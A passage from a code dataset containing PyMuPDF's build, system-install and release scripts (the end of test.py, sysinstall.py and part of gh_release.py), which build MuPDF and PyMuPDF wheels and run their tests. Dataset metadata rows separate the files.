log(f'Running tests with tests/run_compound.py and pytest.')
gh_release.run(command, env_extra=env_extra, timeout=timeout)
except subprocess.TimeoutExpired as e:
log(f'Timeout when running tests.')
raise
finally:
log(f'\n'
f'[As of 2024-10-10 we get warnings from pytest/Python such as:\n'
f' DeprecationWarning: builtin type SwigPyPacked has no __module__ attribute\n'
f'This seems to be due to Swig\'s handling of Py_LIMITED_API.\n'
f'For details see https://github.com/swig/swig/issues/2881.\n'
f']'
)
log('\n' + venv_info(pytest_args=f'{pytest_options} {pytest_arg}'))
def get_pyproject_required(ppt=None):
'''
Returns space-separated names of required packages in pyproject.toml. We
do not do a proper parse and rely on the packages being in a single line.
'''
if ppt is None:
ppt = os.path.abspath(f'{__file__}/../../pyproject.toml')
with open(ppt) as f:
for line in f:
m = re.match('^requires = \\[(.*)\\]$', line)
if m:
names = m.group(1).replace(',', ' ').replace('"', '')
return names
else:
assert 0, f'Failed to find "requires" line in {ppt}'
def wrap_get_requires_for_build_wheel(dir_):
'''
Returns space-separated list of required
packages. Looks at `dir_`/pyproject.toml and calls
`dir_`/setup.py:get_requires_for_build_wheel().
'''
dir_abs = os.path.abspath(dir_)
ret = list()
ppt = os.path.join(dir_abs, 'pyproject.toml')
if os.path.exists(ppt):
ret += get_pyproject_required(ppt)
if os.path.exists(os.path.join(dir_abs, 'setup.py')):
sys.path.insert(0, dir_abs)
try:
from setup import get_requires_for_build_wheel as foo
for i in foo():
ret.append(i)
finally:
del sys.path[0]
return ' '.join(ret)
def log(text):
gh_release.log(text, caller=1)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
# Terminate relatively quietly, failed commands will usually have
# generated diagnostics.
log(f'{e}')
sys.exit(1)
# Other exceptions should not happen, and will generate a full Python
# backtrace etc here.
| 28,116 | Python | .py | 679 | 31.518409 | 152 | 0.581985 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,382 | sysinstall.py | pymupdf_PyMuPDF/scripts/sysinstall.py | #! /usr/bin/env python3
'''
Test for Linux system install of MuPDF and PyMuPDF.
We build and install MuPDF and PyMuPDF into a root directory, then use
scripts/test.py to run PyMuPDF's pytest tests with LD_PRELOAD_PATH and
PYTHONPATH set.
PyMuPDF itself is installed using `python -m install` with a wheel created with
`pip wheel`.
We run install commands with `sudo` if `--root /` is used.
Note that we run some commands with sudo; it's important that these use the
same python as non-sudo, otherwise things can be build and installed for
different python versions. For example when we are run from a github action, it
should not do `- uses: actions/setup-python@v5` but instead use whatever system
python is already defined.
Args:
--mupdf-dir <mupdf_dir>
Path of MuPDF checkout; default is 'mupdf'.
--mupdf-do 0|1
Whether to build and install mupdf.
--mupdf-git <git_args>
Get or update `mupdf_dir` using git. If `mupdf_dir` already
exists we run `git pull` in it; otherwise we run `git
clone` with `<git_args> <mupdf_dir>`. For example:
--mupdf-git "--branch master https://github.com/ArtifexSoftware/mupdf.git"
--mupdf-so-mode <mode>
Used with `install -m <mode> ...` when installing MuPDF. For example
`--mupdf-so-mode 744`.
--packages 0|1
If 1 (the default) we install required system packages such as
`libfreetype-dev`.
--pip 0|venv|sudo
Whether/how to install Python packages.
If '0' we assume required packages are already available.
If 'sudo' we install required Python packages using `sudo pip install
...`.
If 'venv' (the default) we install Python packages and run installer
and test commands inside venv's.
--prefix:
Directory within `root`; default is `/usr/local`. Must start with `/`.
--pymupdf-dir <pymupdf_dir>
Path of PyMuPDF checkout; default is 'PyMuPDF'.
--pymupdf-do 0|1
Whether to build and install pymupdf.
--root <root>
Root of install directory; default is `/`.
--tesseract5 0|1
If 1 (the default), we force installation of libtesseract-dev version
5 (which is not available as a default package in Ubuntu-22.04) from
package repository ppa:alex-p/tesseract-ocr-devel.
--test-venv <test_venv>
Set the name of the venv in which we run tests (only with `--pip
venv`); the default is a hard-coded venv name. The venv will be
created, and required packages installed using `pip`.
--use-installer 0|1
If 1 (the default), we use `python -m installer` to install PyMuPDF
from a generated wheel. [Otherwise we use `pip install`, which refuses
to do a system install with `--root /`, referencing PEP-668.]
-i <implementations>
Passed through to scripts/test.py. Default is 'rR'.
-f <test-fitz>
Passed through to scripts/test.py. Default is '1'.
-p <pytest-options>
Passed through to scripts/test.py.
-t <names>
Passed through to scripts/test.py.
To only show what commands would be run, but not actually run them, specify `-m
0 -p 0 -t 0`.
'''
import glob
import multiprocessing
import os
import platform
import shlex
import subprocess
import sys
import sysconfig
import test as test_py
# Requirements for a system build and install:
#
# system packages (Debian names):
#
g_sys_packages = [
'libfreetype-dev',
'libgumbo-dev',
'libharfbuzz-dev',
'libjbig2dec-dev',
'libjpeg-dev',
'libleptonica-dev',
'libopenjp2-7-dev',
]
# We also need libtesseract-dev version 5.
#
def main():
if 1:
print(f'## {__file__}: Starting.')
print(f'{sys.executable=}')
print(f'{platform.python_version()=}')
print(f'{__file__=}')
print(f'{sys.argv=}')
print(f'{sysconfig.get_path("platlib")=}')
run_command(f'python -V', check=0)
run_command(f'python3 -V', check=0)
run_command(f'sudo python -V', check=0)
run_command(f'sudo python3 -V', check=0)
run_command(f'sudo PATH={os.environ["PATH"]} python -V', check=0)
run_command(f'sudo PATH={os.environ["PATH"]} python3 -V', check=0)
if test_py.github_workflow_unimportant():
return
# Set default behaviour.
#
use_installer = True
mupdf_do = True
mupdf_dir = 'mupdf'
mupdf_git = None
mupdf_so_mode = None
packages = True
prefix = '/usr/local'
pymupdf_do = True
pymupdf_dir = os.path.abspath( f'{__file__}/../..')
root = 'sysinstall_test'
tesseract5 = True
pytest_args = None
pytest_do = True
pytest_name = None
test_venv = 'venv-pymupdf-sysinstall-test'
pip = 'venv'
test_fitz = '1'
test_implementations = 'rR'
# Parse command-line.
#
args = iter(sys.argv[1:])
while 1:
try:
arg = next(args)
except StopIteration:
break
if arg in ('-h', '--help'):
print(__doc__)
return
elif arg == '--mupdf-do': mupdf_do = int(next(args))
elif arg == '--mupdf-dir': mupdf_dir = next(args)
elif arg == '--mupdf-git': mupdf_git = next(args)
elif arg == '--mupdf-so-mode': mupdf_so_mode = next(args)
elif arg == '--packages': packages = int(next(args))
elif arg == '--prefix': prefix = next(args)
elif arg == '--pymupdf-do': pymupdf_do = int(next(args))
elif arg == '--pymupdf-dir': pymupdf_dir = next(args)
elif arg == '--root': root = next(args)
elif arg == '--tesseract5': tesseract5 = int(next(args))
elif arg == '--pytest-do': pytest_do = int(next(args))
elif arg == '--test-venv': test_venv = next(args)
elif arg == '--use-installer': use_installer = int(next(args))
elif arg == '--pip': pip = next(args)
elif arg == '-f': test_fitz = next(args)
elif arg == '-i': test_implementations = next(args)
elif arg == '-p': pytest_args = next(args)
elif arg == '-t': pytest_name = next(args)
else:
assert 0, f'Unrecognised arg: {arg!r}'
assert prefix.startswith('/')
pip_values = ('0', 'sudo', 'venv')
assert pip in pip_values, f'Unrecognised --pip value {pip!r} should be one of: {pip_values!r}'
root = os.path.abspath(root)
root_prefix = f'{root}{prefix}'.replace('//', '/')
sudo = ''
if root == '/':
sudo = f'sudo PATH={os.environ["PATH"]} '
def run(command):
return run_command(command, doit=mupdf_do)
# Get MuPDF from git if specified.
#
if mupdf_git:
# Update existing checkout or do `git clone`.
if os.path.exists(mupdf_dir):
print(f'## Update MuPDF checkout {mupdf_dir}.')
run(f'cd {mupdf_dir} && git pull && git submodule update --init')
else:
# No existing git checkout, so do a fresh clone.
print(f'## Clone MuPDF into {mupdf_dir}.')
run(f'git clone --recursive --depth 1 --shallow-submodules {mupdf_git} {mupdf_dir}')
if packages:
# Install required system packages. We assume a Debian package system.
#
print('## Install system packages required by MuPDF.')
run(f'sudo apt update')
run(f'sudo apt install {" ".join(g_sys_packages)}')
# Ubuntu-22.04 has freeglut3-dev, not libglut-dev.
run(f'sudo apt install libglut-dev | sudo apt install freeglut3-dev')
if tesseract5:
print(f'## Force installation of libtesseract-dev version 5.')
# https://stackoverflow.com/questions/76834972/how-can-i-run-pytesseract-python-library-in-ubuntu-22-04
#
run('sudo apt install -y software-properties-common')
run('sudo add-apt-repository ppa:alex-p/tesseract-ocr-devel')
run('sudo apt update')
run('sudo apt install -y libtesseract-dev')
else:
run('sudo apt install libtesseract-dev')
# Build+install MuPDF. We use mupd:Makefile's install-shared-python target.
#
if pip == 'sudo':
print('## Installing Python packages required for building MuPDF and PyMuPDF.')
run(f'sudo pip install --upgrade pip')
names = test_py.wrap_get_requires_for_build_wheel(f'{__file__}/../..')
run(f'sudo pip install {names}')
print('## Build and install MuPDF.')
command = f'cd {mupdf_dir}'
command += f' && {sudo}make'
command += f' -j {multiprocessing.cpu_count()}'
#command += f' EXE_LDFLAGS=-Wl,--trace' # Makes linker generate diagnostics as it runs.
command += f' DESTDIR={root}'
command += f' HAVE_LEPTONICA=yes'
command += f' HAVE_TESSERACT=yes'
command += f' USE_SYSTEM_LIBS=yes'
command += f' VENV_FLAG={"--venv" if pip == "venv" else ""}'
if mupdf_so_mode:
command += f' SO_INSTALL_MODE={mupdf_so_mode}'
command += f' build_prefix=system-libs-'
command += f' prefix={prefix}'
command += f' verbose=yes'
command += f' install-shared-python'
command += f' INSTALL_MODE=755'
run( command)
# Build+install PyMuPDF.
#
print('## Build and install PyMuPDF.')
def run(command):
return run_command(command, doit=pymupdf_do)
flags_freetype2 = run_command('pkg-config --cflags freetype2', capture_output=1).stdout.strip()
compile_flags = f'-I {root_prefix}/include {flags_freetype2}'
link_flags = f'-L {root_prefix}/lib'
env = ''
env += f'CFLAGS="{compile_flags}" '
env += f'CXXFLAGS="{compile_flags}" '
env += f'LDFLAGS="-L {root}/{prefix}/lib" '
env += f'PYMUPDF_SETUP_MUPDF_BUILD= ' # Use system MuPDF.
if use_installer:
print(f'## Building wheel.')
if pip == 'venv':
venv_name = 'venv-pymupdf-sysinstall'
run(f'pwd')
run(f'rm dist/* || true')
if pip == 'venv':
run(f'{sys.executable} -m venv {venv_name}')
run(f'. {venv_name}/bin/activate && pip install --upgrade pip')
run(f'. {venv_name}/bin/activate && pip install --upgrade installer')
run(f'{env} {venv_name}/bin/python -m pip wheel -vv -w dist {os.path.abspath(pymupdf_dir)}')
elif pip == 'sudo':
run(f'sudo pip install --upgrade pip')
run(f'sudo pip install installer')
run(f'{env} pip wheel -vv -w dist {os.path.abspath(pymupdf_dir)}')
else:
log(f'Not installing "installer" because {pip=}.')
wheel = glob.glob(f'dist/*')
assert len(wheel) == 1, f'{wheel=}'
wheel = wheel[0]
print(f'## Installing wheel using `installer`.')
pv = '.'.join(platform.python_version_tuple()[:2])
p = f'{root_prefix}/lib/python{pv}'
# `python -m installer` fails to overwrite existing files.
run(f'{sudo}rm -r {p}/site-packages/pymupdf || true')
run(f'{sudo}rm -r {p}/site-packages/pymupdf.py || true')
run(f'{sudo}rm -r {p}/site-packages/fitz || true')
run(f'{sudo}rm -r {p}/site-packages/fitz.py || true')
run(f'{sudo}rm -r {p}/site-packages/PyMuPDF-*.dist-info || true')
run(f'{sudo}rm -r {root_prefix}/bin/pymupdf || true')
if pip == 'venv':
run(f'{sudo}{venv_name}/bin/python -m installer --destdir {root} --prefix {prefix} {wheel}')
else:
run(f'{sudo}{sys.executable} -m installer --destdir {root} --prefix {prefix} {wheel}')
# It seems that MuPDF Python bindings are installed into
# `.../dist-packages` (from mupdf:Mafile's call of `$(shell python3
# -c "import sysconfig; print(sysconfig.get_path('platlib'))")` while
# `python -m installer` installs PyMuPDF into `.../site-packages`.
#
# This might be because `sysconfig.get_path('platlib')` returns
# `.../site-packages` if run in a venv, otherwise `.../dist-packages`.
#
# And on github ubuntu-latest, sysconfig.get_path("platlib") is
# /opt/hostedtoolcache/Python/3.11.7/x64/lib/python3.11/site-packages
#
# So we set pythonpath (used later) to import from all
# `pythonX.Y/site-packages/` and `pythonX.Y/dist-packages` directories
# within `root_prefix`:
#
pv = platform.python_version().split('.')
pv = f'python{pv[0]}.{pv[1]}'
pythonpath = list()
for dirpath, dirnames, filenames in os.walk(root_prefix):
if os.path.basename(dirpath) == pv:
for leaf in 'site-packages', 'dist-packages':
if leaf in dirnames:
pythonpath.append(os.path.join(dirpath, leaf))
pythonpath = ':'.join(pythonpath)
print(f'{pythonpath=}')
else:
command = f'{env} pip install -vv --root {root} {os.path.abspath(pymupdf_dir)}'
run( command)
sys.path.insert(0, pymupdf_dir)
import pipcl
del sys.path[0]
pythonpath = pipcl.install_dir(root)
# Show contents of installation directory. This is very slow on github,
# where /usr/local contains lots of things.
#run(f'find {root_prefix}|sort')
# Run pytest tests.
#
print('## Run PyMuPDF pytest tests.')
def run(command):
return run_command(command, doit=pytest_do)
import gh_release
if pip == 'venv':
# Create venv.
run(f'{sys.executable} -m venv {test_venv}')
# Install required packages.
command = f'. {test_venv}/bin/activate'
command += f' && pip install --upgrade pip'
command += f' && pip install --upgrade {gh_release.test_packages}'
run(command)
elif pip == 'sudo':
run(f'sudo pip install --upgrade {gh_release.test_packages}')
else:
log(f'Not installing packages for testing because {pip=}.')
# Run pytest.
#
# We need to set PYTHONPATH and LD_LIBRARY_PATH. In particular we
# use pipcl.install_dir() to find where pipcl will have installed
# PyMuPDF.
command = ''
if pip == 'venv':
command += f'. {test_venv}/bin/activate &&'
command += f' LD_LIBRARY_PATH={root_prefix}/lib PYTHONPATH={pythonpath} PATH=$PATH:{root_prefix}/bin'
run(f'ls -l {root_prefix}/bin/')
# 2024-03-20: Not sure whether/where `pymupdf` binary is installed, so we
# disable the test_cli* tests.
command += f' {pymupdf_dir}/scripts/test.py'
command += f' -v 0'
if pytest_name is None:
excluded_tests = (
'test_color_count',
'test_3050',
'test_cli',
'test_cli_out',
'test_pylint',
'test_textbox3',
'test_3493',
)
excluded_tests = ' and not '.join(excluded_tests)
if not pytest_args:
pytest_args = ''
pytest_args += f' -k \'not {excluded_tests}\''
else:
command += f' -t {pytest_name}'
if test_fitz:
command += f' -f {test_fitz}'
if test_implementations:
command += f' -i {test_implementations}'
if pytest_args:
command += f' -p {shlex.quote(pytest_args)}'
if pytest_do:
command += ' test'
run(command)
def run_command(command, capture_output=False, check=True, doit=True):
if doit:
print(f'## Running: {command}')
sys.stdout.flush()
return subprocess.run(command, shell=1, check=check, text=1, capture_output=capture_output)
else:
print(f'## Would have run: {command}')
if __name__ == '__main__':
main()
| 15,829 | Python | .py | 371 | 34.956873 | 115 | 0.602133 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,383 | gh_release.py | pymupdf_PyMuPDF/scripts/gh_release.py | #! /usr/bin/env python3
'''
Build+test script for PyMuPDF using cibuildwheel. Mostly for use with github
builds.
We run cibuild manually, in order to build and test PyMuPDF wheels.
As of 2024-10-08 we also support the old two wheel flavours that make up
PyMuPDF:
PyMuPDFb
Not specific to particular versions of Python. Contains shared
libraries for the MuPDF C and C++ bindings.
PyMuPDF
Specific to particular versions of Python. Contains the rest of
the PyMuPDF implementation.
Args:
build
Build using cibuildwheel.
build-devel
Build using cibuild with `--platform` set.
pip_install <prefix>
For internal use. Runs `pip install <prefix>-*<platform_tag>.whl`,
where `platform_tag` will be things like 'win32', 'win_amd64',
'x86_64`, depending on the python we are running on.
venv
Run with remaining args inside a venv.
test
Internal.
We also look at specific items in the environment. This allows use with Github
action inputs, which can't be easily translated into command-line arguments.
inputs_flavours
If '0' or unset, build complete PyMuPDF wheels.
If '1', build separate PyMuPDF and PyMuPDFb wheels.
inputs_sdist
inputs_skeleton
Build minimal wheel; for testing only.
inputs_wheels_cps:
Python versions to build for. E.g. 'cp39* cp313*'.
inputs_wheels_default
Default value for other inputs_wheels_* if unset.
inputs_wheels_linux_aarch64
inputs_wheels_linux_auto
inputs_wheels_linux_pyodide
inputs_wheels_macos_arm64
inputs_wheels_macos_auto
inputs_wheels_windows_auto
If '1' we build the relevant wheels.
inputs_PYMUPDF_SETUP_MUPDF_BUILD
Used to directly set PYMUPDF_SETUP_MUPDF_BUILD.
E.g. 'git:--recursive --depth 1 --shallow-submodules --branch master https://github.com/ArtifexSoftware/mupdf.git'
inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE
Used to directly set PYMUPDF_SETUP_MUPDF_BUILD_TYPE. Note that as of
2024-09-10 .github/workflows/build_wheels.yml does not set this.
PYMUPDF_SETUP_PY_LIMITED_API
If not '0' we build a single wheel for all python versions using the
Python Limited API.
Building for Pyodide
If `inputs_wheels_linux_pyodide` is true and we are on Linux, we build a
Pyodide wheel, using scripts/test.py.
Set up for use outside Github
sudo apt install docker.io
sudo usermod -aG docker $USER
Example usage:
PYMUPDF_SETUP_MUPDF_BUILD=../mupdf py -3.9-32 PyMuPDF/scripts/gh_release.py venv build-devel
'''
import glob
import inspect
import os
import platform
import re
import shlex
import subprocess
import sys
import textwrap
import test as test_py
pymupdf_dir = os.path.abspath( f'{__file__}/../..')
def main():
log( '### main():')
log(f'{platform.platform()=}')
log(f'{platform.python_version()=}')
log(f'{platform.architecture()=}')
log(f'{platform.machine()=}')
log(f'{platform.processor()=}')
log(f'{platform.release()=}')
log(f'{platform.system()=}')
log(f'{platform.version()=}')
log(f'{platform.uname()=}')
log(f'{sys.executable=}')
log(f'{sys.maxsize=}')
log(f'sys.argv ({len(sys.argv)}):')
for i, arg in enumerate(sys.argv):
log(f' {i}: {arg!r}')
log(f'os.environ ({len(os.environ)}):')
for k in sorted( os.environ.keys()):
v = os.environ[ k]
log( f' {k}: {v!r}')
if test_py.github_workflow_unimportant():
return
valgrind = False
if len( sys.argv) == 1:
args = iter( ['build'])
else:
args = iter( sys.argv[1:])
while 1:
try:
arg = next(args)
except StopIteration:
break
if arg == 'build':
build(valgrind=valgrind)
elif arg == 'build-devel':
if platform.system() == 'Linux':
p = 'linux'
elif platform.system() == 'Windows':
p = 'windows'
elif platform.system() == 'Darwin':
p = 'macos'
else:
assert 0, f'Unrecognised {platform.system()=}'
build(platform_=p)
elif arg == 'pip_install':
prefix = next(args)
d = os.path.dirname(prefix)
log( f'{prefix=}')
log( f'{d=}')
for leaf in os.listdir(d):
log( f' {d}/{leaf}')
pattern = f'{prefix}-*{platform_tag()}.whl'
paths = glob.glob( pattern)
log( f'{pattern=} {paths=}')
# Follow pipcl.py and look at AUDITWHEEL_PLAT. This allows us to
# cope if building for both musl and normal linux.
awp = os.environ.get('AUDITWHEEL_PLAT')
if awp:
paths = [i for i in paths if awp in i]
log(f'After selecting AUDITWHEEL_PLAT={awp!r}, {paths=}.')
paths = ' '.join( paths)
run( f'pip install {paths}')
elif arg == 'venv':
command = ['python', sys.argv[0]]
for arg in args:
command.append( arg)
venv( command, packages = 'cibuildwheel')
elif arg == 'test':
project = next(args)
package = next(args)
test( project, package, valgrind=valgrind)
elif arg == '--valgrind':
valgrind = int(next(args))
else:
assert 0, f'Unrecognised {arg=}'
def build( platform_=None, valgrind=False):
log( '### build():')
platform_arg = f' --platform {platform_}' if platform_ else ''
# Parameters are in os.environ, as that seems to be the only way that
# Github workflow .yml files can encode them.
#
def get_bool(name, default=0):
v = os.environ.get(name)
if v in ('1', 'true'):
return 1
elif v in ('0', 'false'):
return 0
elif v is None:
return default
else:
assert 0, f'Bad environ {name=} {v=}'
inputs_flavours = get_bool('inputs_flavours', 1)
inputs_sdist = get_bool('inputs_sdist')
inputs_skeleton = os.environ.get('inputs_skeleton')
inputs_wheels_default = get_bool('inputs_wheels_default', 1)
inputs_wheels_linux_aarch64 = get_bool('inputs_wheels_linux_aarch64', inputs_wheels_default)
inputs_wheels_linux_auto = get_bool('inputs_wheels_linux_auto', inputs_wheels_default)
inputs_wheels_linux_pyodide = get_bool('inputs_wheels_linux_pyodide', 0)
inputs_wheels_macos_arm64 = get_bool('inputs_wheels_macos_arm64', 0)
inputs_wheels_macos_auto = get_bool('inputs_wheels_macos_auto', inputs_wheels_default)
inputs_wheels_windows_auto = get_bool('inputs_wheels_windows_auto', inputs_wheels_default)
inputs_wheels_cps = os.environ.get('inputs_wheels_cps')
inputs_PYMUPDF_SETUP_MUPDF_BUILD = os.environ.get('inputs_PYMUPDF_SETUP_MUPDF_BUILD')
inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE = os.environ.get('inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE')
PYMUPDF_SETUP_PY_LIMITED_API = os.environ.get('PYMUPDF_SETUP_PY_LIMITED_API')
log( f'{inputs_flavours=}')
log( f'{inputs_sdist=}')
log( f'{inputs_skeleton=}')
log( f'{inputs_wheels_default=}')
log( f'{inputs_wheels_linux_aarch64=}')
log( f'{inputs_wheels_linux_auto=}')
log( f'{inputs_wheels_linux_pyodide=}')
log( f'{inputs_wheels_macos_arm64=}')
log( f'{inputs_wheels_macos_auto=}')
log( f'{inputs_wheels_windows_auto=}')
log( f'{inputs_wheels_cps=}')
log( f'{inputs_PYMUPDF_SETUP_MUPDF_BUILD=}')
log( f'{inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE=}')
log( f'{PYMUPDF_SETUP_PY_LIMITED_API=}')
# Build Pyodide wheel if specified.
#
if platform.system() == 'Linux' and inputs_wheels_linux_pyodide:
# Pyodide wheels are built by running scripts/test.py, not
# cibuildwheel.
command = f'{sys.executable} scripts/test.py'
if inputs_PYMUPDF_SETUP_MUPDF_BUILD:
command += f' -m {shlex.quote(inputs_PYMUPDF_SETUP_MUPDF_BUILD)}'
command += ' pyodide_wheel'
run(command)
# Build sdist(s).
#
if inputs_sdist:
if pymupdf_dir != os.path.abspath( os.getcwd()):
log( f'Changing dir to {pymupdf_dir=}')
os.chdir( pymupdf_dir)
# Create PyMuPDF sdist.
run(f'{sys.executable} setup.py sdist')
assert glob.glob('dist/PyMuPDF-*.tar.gz')
if inputs_flavours:
# Create PyMuPDFb sdist.
run(
f'{sys.executable} setup.py sdist',
env_extra=dict(PYMUPDF_SETUP_FLAVOUR='b'),
)
assert glob.glob('dist/PyMuPDFb-*.tar.gz')
# Build wheels.
#
if (0
or inputs_wheels_linux_aarch64
or inputs_wheels_linux_auto
or inputs_wheels_macos_arm64
or inputs_wheels_macos_auto
or inputs_wheels_windows_auto
):
env_extra = dict()
def set_if_unset(name, value):
v = os.environ.get(name)
if v is None:
log( f'Setting environment {name=} to {value=}')
env_extra[ name] = value
else:
log( f'Not changing {name}={v!r} to {value!r}')
set_if_unset( 'CIBW_BUILD_VERBOSITY', '1')
# We exclude pp* because of `fitz_wrap.obj : error LNK2001: unresolved
# external symbol PyUnicode_DecodeRawUnicodeEscape`.
# 2024-06-05: musllinux on aarch64 fails because libclang cannot find
# libclang.so.
#
# Note that we had to disable cp313-win32 when 3.13 was experimental
# because there was no 64-bit Python-3.13 available via `py
# -3.13`. (Win32 builds need to use win64 Python because win32
# libclang is broken.)
#
set_if_unset( 'CIBW_SKIP', 'pp* *i686 cp36* cp37* *musllinux*aarch64*')
def make_string(*items):
ret = list()
for item in items:
if item:
ret.append(item)
return ' '.join(ret)
cps = inputs_wheels_cps if inputs_wheels_cps else 'cp39* cp310* cp311* cp312* cp313'
set_if_unset( 'CIBW_BUILD', cps)
for cp in cps.split():
m = re.match('cp([0-9]+)[*]', cp)
assert m
v = int(m.group(1))
if v == 314:
# Need to set CIBW_PRERELEASE_PYTHONS, otherwise cibuildwheel
# will refuse.
log(f'Setting CIBW_PRERELEASE_PYTHONS for Python version {cp=}.')
set_if_unset( 'CIBW_PRERELEASE_PYTHONS', '1')
if platform.system() == 'Linux':
set_if_unset(
'CIBW_ARCHS_LINUX',
make_string(
'auto64' * inputs_wheels_linux_auto,
'aarch64' * inputs_wheels_linux_aarch64,
),
)
if env_extra.get('CIBW_ARCHS_LINUX') == '':
log(f'Not running cibuildwheel because CIBW_ARCHS_LINUX is empty string.')
return
if platform.system() == 'Windows':
set_if_unset(
'CIBW_ARCHS_WINDOWS',
make_string(
'auto' * inputs_wheels_windows_auto,
),
)
if env_extra.get('CIBW_ARCHS_WINDOWS') == '':
log(f'Not running cibuildwheel because CIBW_ARCHS_WINDOWS is empty string.')
return
if platform.system() == 'Darwin':
set_if_unset(
'CIBW_ARCHS_MACOS',
make_string(
'auto' * inputs_wheels_macos_auto,
'arm64' * inputs_wheels_macos_arm64,
),
)
if env_extra.get('CIBW_ARCHS_MACOS') == '':
log(f'Not running cibuildwheel because CIBW_ARCHS_MACOS is empty string.')
return
def env_pass(name):
'''
Adds `name` to CIBW_ENVIRONMENT_PASS_LINUX if required to be available
when building wheel with cibuildwheel.
'''
if platform.system() == 'Linux':
v = env_extra.get('CIBW_ENVIRONMENT_PASS_LINUX', '')
if v:
v += ' '
v += name
env_extra['CIBW_ENVIRONMENT_PASS_LINUX'] = v
def env_set(name, value, pass_=False):
assert isinstance( value, str)
if not name.startswith('CIBW'):
assert pass_, f'Non-CIBW* name requires `pass_` to be true. {name=} {value=}.'
env_extra[ name] = value
if pass_:
env_pass(name)
if os.environ.get('PYMUPDF_SETUP_LIBCLANG'):
env_pass('PYMUPDF_SETUP_LIBCLANG')
if inputs_skeleton:
env_set('PYMUPDF_SETUP_SKELETON', inputs_skeleton, pass_=1)
if inputs_PYMUPDF_SETUP_MUPDF_BUILD not in ('-', None):
log(f'Setting PYMUPDF_SETUP_MUPDF_BUILD to {inputs_PYMUPDF_SETUP_MUPDF_BUILD!r}.')
env_set('PYMUPDF_SETUP_MUPDF_BUILD', inputs_PYMUPDF_SETUP_MUPDF_BUILD, pass_=True)
env_set('PYMUPDF_SETUP_MUPDF_TGZ', '', pass_=True) # Don't put mupdf in sdist.
if inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE not in ('-', None):
log(f'Setting PYMUPDF_SETUP_MUPDF_BUILD_TYPE to {inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE!r}.')
env_set('PYMUPDF_SETUP_MUPDF_BUILD_TYPE', inputs_PYMUPDF_SETUP_MUPDF_BUILD_TYPE, pass_=True)
def set_cibuild_test():
log( f'set_cibuild_test(): {inputs_skeleton=}')
valgrind_text = ''
if valgrind:
valgrind_text = ' --valgrind 1'
env_set('CIBW_TEST_COMMAND', f'python {{project}}/scripts/gh_release.py{valgrind_text} test {{project}} {{package}}')
if pymupdf_dir != os.path.abspath( os.getcwd()):
log( f'Changing dir to {pymupdf_dir=}')
os.chdir( pymupdf_dir)
run('pip install cibuildwheel')
# We include MuPDF build-time files.
flavour_d = True
if PYMUPDF_SETUP_PY_LIMITED_API != '0':
# Build one wheel with oldest python, then fake build with other python
# versions so we test everything.
log(f'{PYMUPDF_SETUP_PY_LIMITED_API=}')
env_pass('PYMUPDF_SETUP_PY_LIMITED_API')
CIBW_BUILD_old = env_extra.get('CIBW_BUILD')
assert CIBW_BUILD_old is not None
env_set('CIBW_BUILD', 'cp39*')
log(f'Building single wheel.')
run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
# Fake-build with all python versions, using the wheel we have
# just created. This works by setting PYMUPDF_SETUP_URL_WHEEL
# which makes PyMuPDF's setup.py copy an existing wheel instead
# of building a wheel itself; it also copes with existing
# wheels having extra platform tags (from cibuildwheel's use of
# auditwheel).
#
env_set('PYMUPDF_SETUP_URL_WHEEL', f'file://wheelhouse/', pass_=True)
set_cibuild_test()
env_set('CIBW_BUILD', CIBW_BUILD_old)
# Disable cibuildwheels use of auditwheel. The wheel was repaired
# when it was created above so we don't need to do so again. This
# also avoids problems with musl wheels on a Linux glibc host where
# auditwheel fails with: `ValueError: Cannot repair wheel, because
# required library "libgcc_s-a3a07607.so.1" could not be located`.
#
env_set('CIBW_REPAIR_WHEEL_COMMAND', '')
log(f'Testing on all python versions using wheels in wheelhouse/.')
run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
elif inputs_flavours:
# Build and test PyMuPDF and PyMuPDFb wheels.
#
# First build PyMuPDFb wheel. cibuildwheel will build a single wheel
# here, which will work with any python version on current OS.
#
flavour = 'b'
if flavour_d:
# Include MuPDF build-time files.
flavour += 'd'
env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
run( f'cibuildwheel{platform_arg}', env_extra)
run( 'echo after {flavour=}')
run( 'ls -l wheelhouse')
# Now set environment to build PyMuPDF wheels. cibuildwheel will build
# one for each Python version.
#
# Tell cibuildwheel not to use `auditwheel`, because it cannot cope
# with us deliberately putting required libraries into a different
# wheel.
#
# Also, `auditwheel addtag` says `No tags to be added` and terminates
# with non-zero. See: https://github.com/pypa/auditwheel/issues/439.
#
env_set('CIBW_REPAIR_WHEEL_COMMAND_LINUX', '')
env_set('CIBW_REPAIR_WHEEL_COMMAND_MACOS', '')
# We tell cibuildwheel to test these wheels, but also set
# CIBW_BEFORE_TEST to make it first run ourselves with the
# `pip_install` arg to install the PyMuPDFb wheel. Otherwise
# installation of PyMuPDF would fail because it lists the
# PyMuPDFb wheel as a prerequisite. We need to use `pip_install`
# because wildcards do not work on Windows, and we want to be
# careful to avoid incompatible wheels, e.g. 32 vs 64-bit wheels
# coexist during Windows builds.
#
env_set('CIBW_BEFORE_TEST', f'python scripts/gh_release.py pip_install wheelhouse/PyMuPDFb')
set_cibuild_test()
# Build main PyMuPDF wheel.
flavour = 'p'
env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
else:
# Build and test wheels which contain everything.
#
flavour = 'pb'
if flavour_d:
flavour += 'd'
set_cibuild_test()
env_set( 'PYMUPDF_SETUP_FLAVOUR', flavour, pass_=1)
run( f'cibuildwheel{platform_arg}', env_extra=env_extra)
run( 'ls -lt wheelhouse')
def cpu_bits():
return 32 if sys.maxsize == 2**31 - 1 else 64
# Name of venv used by `venv()`.
#
